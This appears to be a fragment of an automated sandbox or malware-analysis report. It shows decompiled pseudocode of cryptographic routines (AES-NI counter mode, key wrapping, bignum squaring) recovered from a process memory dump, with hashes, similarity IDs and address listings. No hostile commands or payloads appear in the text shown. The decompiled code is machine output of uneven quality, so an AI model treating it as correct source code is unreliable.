                                                              0x00b9daf8
                                                              0x00b9db03
                                                              0x00b9db17
                                                              0x00b9db22
                                                              0x00b9db2c
                                                              0x00b9db34
                                                              0x00b9db3e
                                                              0x00b9db44
                                                              0x00b9db4f
                                                              0x00b9db56
                                                              0x00b9db5c
                                                              0x00b9db60
                                                              0x00b9db63
                                                              0x00b9db63
                                                              0x00b9db69
                                                              0x00b9db6a
                                                              0x00b9db6d
                                                              0x00b9db70
                                                              0x00b9db77
                                                              0x00b9db86
                                                              0x00b9db86
                                                              0x00000000
                                                              0x00b9da99
                                                              0x00b9db8b
                                                              0x00b9db8c
                                                              0x00b9db8e
                                                              0x00b9db9b
                                                              0x00000000
                                                              0x00b9d9e0
                                                              0x00b9d9e0
                                                              0x00b9d9e4
                                                              0x00b9d9ef
                                                              0x00b9d9f1

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91c4b42d9cc7a207ca6aacbf1f36683e1ba95b8e53cefcaaa68828bda594ca16
                                                              • Instruction ID: 863299f24eb18963cdf0209e66dcc6c70d87b4c9182d527d61ecfa6bffb69879
                                                              • Opcode Fuzzy Hash: 91c4b42d9cc7a207ca6aacbf1f36683e1ba95b8e53cefcaaa68828bda594ca16
                                                              • Instruction Fuzzy Hash: 3F518075A08B009FD368CF29C581A5BBBE1FF8C310F558A2EE59A87660D731E841CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9D7D0, Relevance: .1, Instructions: 125COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 36%
                                                              			E00B9D7D0(intOrPtr __ebx, void* __ebp, signed int _a1, intOrPtr _a4, signed int _a5, char _a8, signed int _a9, unsigned int _a12, short _a13, signed int _a15, signed char _a16, signed int _a18, signed int _a19, signed char _a20, signed char _a22, signed char _a23, signed char _a24, intOrPtr _a28, signed char _a32, signed char _a36, signed char _a40, intOrPtr _a44, signed char _a48, signed char _a49, signed char _a50, signed char _a51, signed char _a52, signed char _a53, signed char _a54, signed char _a55, signed char _a56, intOrPtr _a60, char _a64, unsigned int _a68, signed char _a71, signed int _a72, intOrPtr* _a80, intOrPtr _a84, intOrPtr _a88, signed char _a92) {
				signed char _v0;
				void* __edi;
				void* __esi;
				signed int _t62;
				unsigned int _t76;
				signed char _t81;
				signed char _t82;
				signed int _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				signed char _t109;
				signed char _t116;
				signed char _t124;
				signed char _t126;
				intOrPtr _t129;
				intOrPtr* _t132;
				signed int _t137;
				signed int _t139;

				_t91 = __ebx;
				E00C6BB10(0x4c);
				_t62 =  *0xcc5970; // 0x851ab4dd
				_a72 = _t62 ^ _t137;
				_t103 = _a84;
				_t132 = _a80;
				_t129 = _a88;
				_t64 = _t129 - 1;
				if(_t129 - 1 > 0xe) {
					L3:
					return E00C69C26(_t64 | 0xffffffff, _t91, _a72 ^ _t137, _t121, _t129, _t132);
				} else {
					_t64 = _a92;
					_t121 = _t64 - 1;
					if(_t64 - 1 > 0xf) {
						goto L3;
					} else {
						_v0 = _t64 << 0x00000004 & 0x000000fe;
						_a1 = 0;
						_a5 = 0;
						_a9 = 0;
						_a13 = 0;
						_a15 = 0;
						E00C6B7A0(__ebx, _t129, _t132,  &_a16 - _t129, _t103, _t129);
						 *( &_a15 - _t129) =  *( &_a15 - _t129) | 0x00000001;
						_a64 = _a8;
						_t76 = _a12;
						_a68 = _t76;
						_a56 = _v0;
						_a60 = _a4;
						_a71 = _t76 >> 0x00000018 & 0x000000c0;
						 *((intOrPtr*)( *_t132))( &_a56,  &_a16,  *((intOrPtr*)(_t132 + 8)), __ebp, __ebx);
						_t109 = _a16;
						_t81 = _a20;
						_t124 = _a24;
						_a48 = _t109 ^ _t109;
						_a32 = _t109;
						_a50 = _a19 & 0x000000ff ^ _a18;
						_a49 = _a18 ^ _t109;
						_a51 = _t81 ^ _a19;
						_a52 = _t81 ^ _t81;
						_t116 = _a22;
						_a36 = _t81;
						_t82 = _a23;
						_a53 = _t116 ^ _t81;
						_a40 = _t124;
						_a54 = _t82 ^ _t116;
						_t139 = _t137 + 0x18;
						_t101 = _a15 & 7;
						_a44 = _a28;
						_a55 = _t124 ^ _t82;
						_t126 =  &(( &_a48)[_t139]);
						E00B9D3D0(_t101, _t126, _t132 + 0x88, (_a15 & 0x3f) >> 3);
						_pop(_t102);
						 *(_t132 + 0x97) =  *(_t132 + 0x97) | ( *(_t139 +  &_a64) & 0x000000ff & (_t126 | 0x000000ff) << 0x00000008) >> 0x00000008 - _t101;
						return E00C69C26(1, _t102, _a72 ^ _t139, (_t126 | 0x000000ff) << 8, _t132 + 0x88, _t132);
					}
				}
			}





















                                                              0x00b9d7d0
                                                              0x00b9d7d5
                                                              0x00b9d7da
                                                              0x00b9d7e1
                                                              0x00b9d7e5
                                                              0x00b9d7ea
                                                              0x00b9d7ef
                                                              0x00b9d7f3
                                                              0x00b9d7f9
                                                              0x00b9d946
                                                              0x00b9d959
                                                              0x00b9d7ff
                                                              0x00b9d7ff
                                                              0x00b9d803
                                                              0x00b9d809
                                                              0x00000000
                                                              0x00b9d80f
                                                              0x00b9d815
                                                              0x00b9d81c
                                                              0x00b9d820
                                                              0x00b9d824
                                                              0x00b9d828
                                                              0x00b9d82d
                                                              0x00b9d83a
                                                              0x00b9d845
                                                              0x00b9d854
                                                              0x00b9d858
                                                              0x00b9d85c
                                                              0x00b9d860
                                                              0x00b9d86f
                                                              0x00b9d877
                                                              0x00b9d881
                                                              0x00b9d883
                                                              0x00b9d887
                                                              0x00b9d88f
                                                              0x00b9d893
                                                              0x00b9d89d
                                                              0x00b9d8ae
                                                              0x00b9d8b8
                                                              0x00b9d8bc
                                                              0x00b9d8c4
                                                              0x00b9d8c8
                                                              0x00b9d8d0
                                                              0x00b9d8d4
                                                              0x00b9d8d8
                                                              0x00b9d8de
                                                              0x00b9d8ee
                                                              0x00b9d8f6
                                                              0x00b9d8f9
                                                              0x00b9d8ff
                                                              0x00b9d903
                                                              0x00b9d90d
                                                              0x00b9d911
                                                              0x00b9d925
                                                              0x00b9d92b
                                                              0x00b9d945
                                                              0x00b9d945
                                                              0x00b9d809

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6751eedb1fd028d48fd4015affb39f07af50c667493a1034d70b936175a3a42
                                                              • Instruction ID: 60d51113cc60fdd494e479c8aaaf65148c59f0e2e6605b0300daded16f5ab637
                                                              • Opcode Fuzzy Hash: c6751eedb1fd028d48fd4015affb39f07af50c667493a1034d70b936175a3a42
                                                              • Instruction Fuzzy Hash: DE4132B620D3809FC301CB69849059BFBE5ABDA310F885D6EF4D887342D6B4E548CB53
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BC8670, Relevance: .1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E00BC8670(void* __eflags, signed int* _a4, signed int* _a8, signed int _a12) {
				signed int _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t121;
				signed int _t123;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				signed int* _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int* _t163;
				signed int* _t165;
				signed int* _t168;

				_t111 = 0xecc790;
				asm("bt dword [eax], 0x1a");
				if(__eflags >= 0) {
					_t168 = _a4;
					_t165 = _a8;
					_t137 = _a12 & 0xfffffff8;
					__eflags = _t137;
					while(_t137 != 0) {
						_t119 =  *_t165;
						 *_t168 = _t119 * _t119;
						_t168[1] = _t119 * _t119 >> 0x20;
						_t121 = _t165[1];
						_t168[2] = _t121 * _t121;
						_t168[3] = _t121 * _t121 >> 0x20;
						_t123 = _t165[2];
						_t168[4] = _t123 * _t123;
						_t168[5] = _t123 * _t123 >> 0x20;
						_t125 = _t165[3];
						_t168[6] = _t125 * _t125;
						_t168[7] = _t125 * _t125 >> 0x20;
						_t127 = _t165[4];
						_t168[8] = _t127 * _t127;
						_t168[9] = _t127 * _t127 >> 0x20;
						_t129 = _t165[5];
						_t168[0xa] = _t129 * _t129;
						_t168[0xb] = _t129 * _t129 >> 0x20;
						_t131 = _t165[6];
						_t168[0xc] = _t131 * _t131;
						_t168[0xd] = _t131 * _t131 >> 0x20;
						_t133 = _t165[7];
						_t111 = _t133 * _t133;
						_t168[0xe] = _t111;
						_t168[0xf] = _t133 * _t133 >> 0x20;
						_t165 =  &(_t165[8]);
						_t168 =  &(_t168[0x10]);
						_t137 = _t137 - 8;
						__eflags = _t137;
					}
					_t139 = _a12 & 0x00000007;
					__eflags = _t139;
					if(_t139 != 0) {
						_t112 =  *_t165;
						_t111 = _t112 * _t112;
						 *_t168 = _t111;
						_t141 = _t139 - 1;
						__eflags = _t141;
						_t168[1] = _t112 * _t112 >> 0x20;
						if(_t141 != 0) {
							_t113 = _t165[1];
							_t111 = _t113 * _t113;
							_t168[2] = _t111;
							_t142 = _t141 - 1;
							__eflags = _t142;
							_t168[3] = _t113 * _t113 >> 0x20;
							if(_t142 != 0) {
								_t114 = _t165[2];
								_t111 = _t114 * _t114;
								_t168[4] = _t111;
								_t143 = _t142 - 1;
								__eflags = _t143;
								_t168[5] = _t114 * _t114 >> 0x20;
								if(_t143 != 0) {
									_t115 = _t165[3];
									_t111 = _t115 * _t115;
									_t168[6] = _t111;
									_t144 = _t143 - 1;
									__eflags = _t144;
									_t168[7] = _t115 * _t115 >> 0x20;
									if(_t144 != 0) {
										_t116 = _t165[4];
										_t111 = _t116 * _t116;
										_t168[8] = _t111;
										_t145 = _t144 - 1;
										__eflags = _t145;
										_t168[9] = _t116 * _t116 >> 0x20;
										if(_t145 != 0) {
											_t117 = _t165[5];
											_t111 = _t117 * _t117;
											_t168[0xa] = _t111;
											__eflags = _t145 != 1;
											_t168[0xb] = _t117 * _t117 >> 0x20;
											if(_t145 != 1) {
												_t118 = _t165[6];
												_t111 = _t118 * _t118;
												__eflags = _t111;
												_t168[0xc] = _t111;
												_t168[0xd] = _t118 * _t118 >> 0x20;
											}
										}
									}
								}
							}
						}
					}
					return _t111;
				} else {
					_t134 = _a4;
					_t163 = _a8;
					_t147 = _a12;
					goto L2;
					L2:
					asm("movd mm0, dword [edx]");
					asm("pmuludq mm0, mm0");
					_t163 =  &(_t163[1]);
					asm("movq [eax], mm0");
					_t147 = _t147 - 1;
					_t134 =  &(_t134[2]);
					if(_t147 != 0) {
						goto L2;
					} else {
						asm("emms");
						return _t134;
					}
				}
			}































                                                              0x00bc8670
                                                              0x00bc8676
                                                              0x00bc867a
                                                              0x00bc86b4
                                                              0x00bc86b8
                                                              0x00bc86c0
                                                              0x00bc86c0
                                                              0x00bc86c3
                                                              0x00bc86c9
                                                              0x00bc86cd
                                                              0x00bc86cf
                                                              0x00bc86d2
                                                              0x00bc86d7
                                                              0x00bc86da
                                                              0x00bc86dd
                                                              0x00bc86e2
                                                              0x00bc86e5
                                                              0x00bc86e8
                                                              0x00bc86ed
                                                              0x00bc86f0
                                                              0x00bc86f3
                                                              0x00bc86f8
                                                              0x00bc86fb
                                                              0x00bc86fe
                                                              0x00bc8703
                                                              0x00bc8706
                                                              0x00bc8709
                                                              0x00bc870e
                                                              0x00bc8711
                                                              0x00bc8714
                                                              0x00bc8717
                                                              0x00bc8719
                                                              0x00bc871c
                                                              0x00bc871f
                                                              0x00bc8722
                                                              0x00bc8725
                                                              0x00bc8725
                                                              0x00bc8725
                                                              0x00bc8732
                                                              0x00bc8732
                                                              0x00bc8735
                                                              0x00bc873b
                                                              0x00bc873d
                                                              0x00bc873f
                                                              0x00bc8741
                                                              0x00bc8741
                                                              0x00bc8742
                                                              0x00bc8745
                                                              0x00bc874b
                                                              0x00bc874e
                                                              0x00bc8750
                                                              0x00bc8753
                                                              0x00bc8753
                                                              0x00bc8754
                                                              0x00bc8757
                                                              0x00bc875d
                                                              0x00bc8760
                                                              0x00bc8762
                                                              0x00bc8765
                                                              0x00bc8765
                                                              0x00bc8766
                                                              0x00bc8769
                                                              0x00bc876f
                                                              0x00bc8772
                                                              0x00bc8774
                                                              0x00bc8777
                                                              0x00bc8777
                                                              0x00bc8778
                                                              0x00bc877b
                                                              0x00bc8781
                                                              0x00bc8784
                                                              0x00bc8786
                                                              0x00bc8789
                                                              0x00bc8789
                                                              0x00bc878a
                                                              0x00bc878d
                                                              0x00bc8793
                                                              0x00bc8796
                                                              0x00bc8798
                                                              0x00bc879b
                                                              0x00bc879c
                                                              0x00bc879f
                                                              0x00bc87a5
                                                              0x00bc87a8
                                                              0x00bc87a8
                                                              0x00bc87aa
                                                              0x00bc87ad
                                                              0x00bc87ad
                                                              0x00bc879f
                                                              0x00bc878d
                                                              0x00bc877b
                                                              0x00bc8769
                                                              0x00bc8757
                                                              0x00bc8745
                                                              0x00bc87b4
                                                              0x00bc8680
                                                              0x00bc8680
                                                              0x00bc8684
                                                              0x00bc8688
                                                              0x00bc8688
                                                              0x00bc8690
                                                              0x00bc8690
                                                              0x00bc8693
                                                              0x00bc8696
                                                              0x00bc8699
                                                              0x00bc869c
                                                              0x00bc869f
                                                              0x00bc86a2
                                                              0x00000000
                                                              0x00bc86a8
                                                              0x00bc86a8
                                                              0x00bc86aa
                                                              0x00bc86aa
                                                              0x00bc86a2

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0956bd6b21b7d7e413a2c88ead570a8f7bfc586c99e94cf1b867e2dfec6b5a1b
                                                              • Instruction ID: 1760d258a6f6fb60320b4f9114a250e9baf38df95ebd61e00682313d539a5610
                                                              • Opcode Fuzzy Hash: 0956bd6b21b7d7e413a2c88ead570a8f7bfc586c99e94cf1b867e2dfec6b5a1b
                                                              • Instruction Fuzzy Hash: 2A4152B5900B029FC364CF2ED285912FBF5FB982107548A6ED499C7B20E730F9548F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B99160, Relevance: .1, Instructions: 110COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 27%
                                                              			E00B99160(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void* _a24, intOrPtr _a224) {
				intOrPtr _v28;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _t28;
				signed int _t31;
				void* _t33;
				signed int _t35;
				intOrPtr _t38;
				void* _t39;
				intOrPtr _t40;
				void* _t41;
				void* _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t51;
				intOrPtr _t52;

				_t47 = _a4;
				_t45 = _a8;
				_t28 = _a12;
				_t40 = _a16;
				_v28 = _t52;
				asm("movdqu xmm7, [ebx]");
				asm("movdqu xmm3, [ecx]");
				_t35 =  *(_t40 + 0xf0);
				 *(_t52 - 0x0000003c & 0xfffffff0) = 0xc0d0e0f;
				_v72 = 0x8090a0b;
				_v68 = 0x4050607;
				_v64 = 0x10203;
				_v60 = 1;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				asm("movdqa xmm5, [esp]");
				asm("movdqa xmm2, xmm7");
				_t51 = _t40;
				_t31 = _t35;
				asm("pshufb xmm7, xmm5");
				asm("movups xmm0, [edx]");
				asm("movups xmm1, [edx+0x10]");
				_t41 = _t40 + 0x20;
				asm("xorps xmm2, xmm0");
				do {
					asm("aesenc xmm2, xmm1");
					_t35 = _t35 - 1;
					asm("movups xmm1, [edx]");
					_t41 = _t41 + 0x10;
				} while (_t35 != 0);
				asm("aesenclast xmm2, xmm1");
				asm("movups xmm6, [esi]");
				asm("paddq xmm7, [esp+0x10]");
				_t48 = _t47 + 0x10;
				_t33 = 0x10 - (_t31 << 4);
				while(1) {
					asm("xorps xmm6, xmm2");
					asm("movdqa xmm2, xmm7");
					asm("movups [edi], xmm6");
					_t45 = _t45 + 0x10;
					asm("pshufb xmm2, xmm5");
					_t28 = _t28 - 1;
					if(_t28 == 0) {
						break;
					}
					asm("movups xmm0, [ebp]");
					_t39 = _t33;
					asm("movups xmm1, [ebp+0x10]");
					asm("xorps xmm6, xmm0");
					asm("xorps xmm2, xmm0");
					asm("xorps xmm3, xmm6");
					asm("movups xmm0, [ebp+0x20]");
					do {
						asm("aesenc xmm2, xmm1");
						asm("aesenc xmm3, xmm1");
						asm("movups xmm1, [edx+ecx]");
						_t39 = _t39 + 0x20;
						asm("aesenc xmm2, xmm0");
						asm("aesenc xmm3, xmm0");
						asm("movups xmm0, [edx+ecx-0x10]");
					} while (_t39 != 0);
					asm("movups xmm6, [esi]");
					asm("paddq xmm7, [esp+0x10]");
					asm("aesenc xmm2, xmm1");
					asm("aesenc xmm3, xmm1");
					asm("aesenclast xmm2, xmm0");
					asm("aesenclast xmm3, xmm0");
					_t48 = _t48 + 0x10;
				}
				_t38 = _a224;
				asm("movups xmm0, [edx]");
				asm("movups xmm1, [edx+0x10]");
				asm("xorps xmm6, xmm0");
				_t44 = _t51 + 0x20;
				asm("xorps xmm3, xmm6");
				do {
					asm("aesenc xmm3, xmm1");
					_t38 = _t38 - 1;
					asm("movups xmm1, [edx]");
					_t44 = _t44 + 0x10;
				} while (_t38 != 0);
				asm("aesenclast xmm3, xmm1");
				asm("movups [edi], xmm3");
				asm("pxor xmm0, xmm0");
				asm("pxor xmm1, xmm1");
				asm("pxor xmm2, xmm2");
				asm("pxor xmm3, xmm3");
				asm("pxor xmm4, xmm4");
				asm("pxor xmm5, xmm5");
				asm("pxor xmm6, xmm6");
				asm("pxor xmm7, xmm7");
				return _t28;
			}


























                                                              0x00b99164
                                                              0x00b99168
                                                              0x00b9916c
                                                              0x00b99170
                                                              0x00b99184
                                                              0x00b99188
                                                              0x00b9918c
                                                              0x00b99190
                                                              0x00b99196
                                                              0x00b9919d
                                                              0x00b991a5
                                                              0x00b991ad
                                                              0x00b991bc
                                                              0x00b991c0
                                                              0x00b991c4
                                                              0x00b991c8
                                                              0x00b991cc
                                                              0x00b991d1
                                                              0x00b991d5
                                                              0x00b991d7
                                                              0x00b991d9
                                                              0x00b991de
                                                              0x00b991e1
                                                              0x00b991e5
                                                              0x00b991e8
                                                              0x00b991eb
                                                              0x00b991eb
                                                              0x00b991f0
                                                              0x00b991f1
                                                              0x00b991f4
                                                              0x00b991f4
                                                              0x00b991fd
                                                              0x00b9920a
                                                              0x00b9920d
                                                              0x00b99213
                                                              0x00b9921c
                                                              0x00b99230
                                                              0x00b99230
                                                              0x00b99233
                                                              0x00b99237
                                                              0x00b9923a
                                                              0x00b9923d
                                                              0x00b99242
                                                              0x00b99245
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9924b
                                                              0x00b9924f
                                                              0x00b99251
                                                              0x00b99255
                                                              0x00b99258
                                                              0x00b9925b
                                                              0x00b9925e
                                                              0x00b99262
                                                              0x00b99262
                                                              0x00b99267
                                                              0x00b9926c
                                                              0x00b99270
                                                              0x00b99273
                                                              0x00b99278
                                                              0x00b9927d
                                                              0x00b9927d
                                                              0x00b99288
                                                              0x00b9928b
                                                              0x00b99291
                                                              0x00b99296
                                                              0x00b9929b
                                                              0x00b992a0
                                                              0x00b992a5
                                                              0x00b992a5
                                                              0x00b992b0
                                                              0x00b992b8
                                                              0x00b992bb
                                                              0x00b992bf
                                                              0x00b992c2
                                                              0x00b992c5
                                                              0x00b992c8
                                                              0x00b992c8
                                                              0x00b992cd
                                                              0x00b992ce
                                                              0x00b992d1
                                                              0x00b992d1
                                                              0x00b992da
                                                              0x00b992e7
                                                              0x00b992ea
                                                              0x00b992ee
                                                              0x00b992f2
                                                              0x00b992f6
                                                              0x00b992fa
                                                              0x00b992fe
                                                              0x00b99302
                                                              0x00b99306
                                                              0x00b9930e

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7ad43ef9492b0eabf3af094ecf28adf8b082ba3035ed07e572c91c519b4f747
                                                              • Instruction ID: 32a52684b21525c1c8eed40f083ed9766ad7d8329b44efec72d17bde9370eacd
                                                              • Opcode Fuzzy Hash: d7ad43ef9492b0eabf3af094ecf28adf8b082ba3035ed07e572c91c519b4f747
                                                              • Instruction Fuzzy Hash: F741B234D0CF5A97D7029F3DC441166F7A0BFAA248F04CB1EED9436562E731BAC89691
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA41C0, Relevance: .1, Instructions: 103COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 54%
                                                              			E00BA41C0(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __edx, intOrPtr __edi, void* __ebp, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, char _a20, signed int _a24, signed int _a25, signed int _a26, signed int _a27, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a44, intOrPtr* _a48, intOrPtr _a52, intOrPtr _a56) {
				unsigned int _v0;
				void* __esi;
				signed int _t51;
				unsigned int _t55;
				unsigned int _t59;
				unsigned int _t70;
				intOrPtr _t71;
				char* _t77;
				intOrPtr* _t81;
				void* _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				intOrPtr _t101;
				signed int _t102;
				signed int _t104;

				_t93 = __edi;
				_t84 = __edx;
				_t66 = __ebx;
				E00C6BB10(0x28);
				_t51 =  *0xcc5970; // 0x851ab4dd
				_a36 = _t51 ^ _t102;
				_a12 = _a48;
				_t101 = _a44;
				_t55 = _a56 - 8;
				_t98 = _a52;
				_a16 = __edx;
				_v0 = _t55;
				if((_t55 & 0x00000007) != 0) {
					L11:
					return E00C69C26(0, _t66, _a36 ^ _t102, _t84, _t93, _t98);
				} else {
					_t84 = _t55 - 0x10;
					if(_t55 - 0x10 > 0x7ffffff0) {
						goto L11;
					} else {
						_push(__ebx);
						_push(__edi);
						_a20 =  *__ecx;
						_t70 = (_t55 >> 3) + (_t55 >> 3) * 2 + (_t55 >> 3) + (_t55 >> 3) * 2;
						_a24 =  *((intOrPtr*)(__ecx + 4));
						E00C6BBC0(_t70, __edi, _t98, _t98, __ecx + 8, _t55);
						_t59 = _v0;
						_t104 = _t102 + 0xc;
						_a8 = _t59 + _t98 - 8;
						_a4 = 6;
						do {
							_t99 = _a8;
							if(_t59 > 0) {
								_t96 = (_t59 - 1 >> 3) + 1;
								do {
									_a27 = _a27 ^ _t70;
									if(_t70 > 0xff) {
										_a26 = _a26 ^ _t70 >> 0x00000008;
										_a25 = _a25 ^ _t70 >> 0x00000010;
										_a24 = _a24 ^ _t70 >> 0x00000018;
									}
									_t77 =  &_a20;
									_a28 =  *_t99;
									_a32 =  *((intOrPtr*)(_t99 + 4));
									_a16(_t77, _t77, _t101);
									 *_t99 = _a28;
									 *((intOrPtr*)(_t99 + 4)) = _a32;
									_t104 = _t104 + 0xc;
									_t70 = _t70 - 1;
									_t99 = _t99 - 8;
									_t96 = _t96 - 1;
								} while (_t96 != 0);
								_t59 = _v0;
							}
							_t41 =  &_a4;
							 *_t41 = _a4 - 1;
						} while ( *_t41 != 0);
						_t81 = _a12;
						_pop(_t97);
						_pop(_t71);
						 *_t81 = _a20;
						 *((intOrPtr*)(_t81 + 4)) = _a24;
						return E00C69C26(_t59, _t71, _a36 ^ _t104, _a24, _t97, _t99);
					}
				}
			}



















                                                              0x00ba41c0
                                                              0x00ba41c0
                                                              0x00ba41c0
                                                              0x00ba41c5
                                                              0x00ba41ca
                                                              0x00ba41d1
                                                              0x00ba41d9
                                                              0x00ba41e2
                                                              0x00ba41e6
                                                              0x00ba41ea
                                                              0x00ba41ee
                                                              0x00ba41f2
                                                              0x00ba41f8
                                                              0x00ba42e9
                                                              0x00ba42fb
                                                              0x00ba41fe
                                                              0x00ba41fe
                                                              0x00ba4207
                                                              0x00000000
                                                              0x00ba420d
                                                              0x00ba420f
                                                              0x00ba4210
                                                              0x00ba4211
                                                              0x00ba4226
                                                              0x00ba4228
                                                              0x00ba422c
                                                              0x00ba4231
                                                              0x00ba4239
                                                              0x00ba423c
                                                              0x00ba4240
                                                              0x00ba4248
                                                              0x00ba4248
                                                              0x00ba424e
                                                              0x00ba4256
                                                              0x00ba4260
                                                              0x00ba4260
                                                              0x00ba426a
                                                              0x00ba4273
                                                              0x00ba427a
                                                              0x00ba4283
                                                              0x00ba4283
                                                              0x00ba428c
                                                              0x00ba4291
                                                              0x00ba4299
                                                              0x00ba429d
                                                              0x00ba42a9
                                                              0x00ba42ab
                                                              0x00ba42ae
                                                              0x00ba42b1
                                                              0x00ba42b2
                                                              0x00ba42b5
                                                              0x00ba42b5
                                                              0x00ba42ba
                                                              0x00ba42ba
                                                              0x00ba42be
                                                              0x00ba42be
                                                              0x00ba42be
                                                              0x00ba42c9
                                                              0x00ba42cd
                                                              0x00ba42ce
                                                              0x00ba42cf
                                                              0x00ba42d6
                                                              0x00ba42e8
                                                              0x00ba42e8
                                                              0x00ba4207

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
